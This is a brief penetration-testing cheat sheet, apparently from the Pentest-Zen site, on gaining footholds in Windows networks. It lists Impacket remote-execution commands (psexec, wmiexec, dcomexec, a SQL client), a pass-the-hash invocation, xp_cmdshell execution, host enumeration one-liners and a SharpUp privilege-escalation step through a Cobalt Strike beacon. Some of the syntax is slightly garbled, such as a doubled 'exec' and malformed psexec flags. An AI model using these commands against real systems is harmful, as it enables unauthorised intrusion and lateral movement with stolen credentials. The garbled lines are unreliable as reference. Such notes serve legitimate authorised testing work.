Footholds

Using Impacket Remote Tools:

Syntax:  {variable-placeholder}

without -c {cmd} returns a cmd shell 

Impacket Examples Folder:

  • msclient.py - Provides SQL shell on Tgt

  • psexec.py - Executes a file on a remote host

  • smbexec.py - Executes a file on a remote host using SMB

  • wmiexec.py - Executes a file on a remote host WMI

  • dcomexec.py - Provides a limited shell via DCOM

msclient.py - example:

  • python msclient.py {sql-usr}:{Pswd}@{SqlSvr-ip}

    • From prompt>

      • SELECT name FROM master.dbo.sysdatabases WHERE name NOT IN ('master', 'tempdb', 'model', 'msdb');

      •  SELECT TOP(5) * FROM {tbl-name};

      • exec exec master.dbo.xp_cmdshell {cmd-2-exec}

psexec.py - example:

  • python psexec.py {domain}/{user}:{Pswd}@{tgt-ip}

  • python psexec.py {domain}/{user}:{Pswd}@{tgt-ip} -c {path/2/File.ext}

  • python psexec.py -d [domain] -hashes {0:NTLM-hash} -ip {tgt-ip} -command {cmd.exe -c }

wmiexec.py - example:

  • python wmiexec.py {domain}/{user}:{Pswd}@{tgt-ip} 

  • python wmiexec.py {domain}/{user}:{Pswd}@{tgt-ip} -c {path/2/File.ext}

dcomexec.py - example:

  • python dcomexec.py {domain}/{user}:{Pswd}@{tgt-ip} 

Documenting Hosts from Cmd Shells

Windows Hosts:

  • hostname & ver & ipconfig | findstr /i "ipv4"

Nix Hosts:

  • uname -a & ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'

Privilege Escalation Techniques

SharpUp.Exe (https://github.com/GhostPack/SharpUp):

  • Via Cobalt Strike Beacon:  execute-assembly SharpUp.exe

Placeholder - more to come!:

 

Pentest-Zen (ExitC0de00c.com)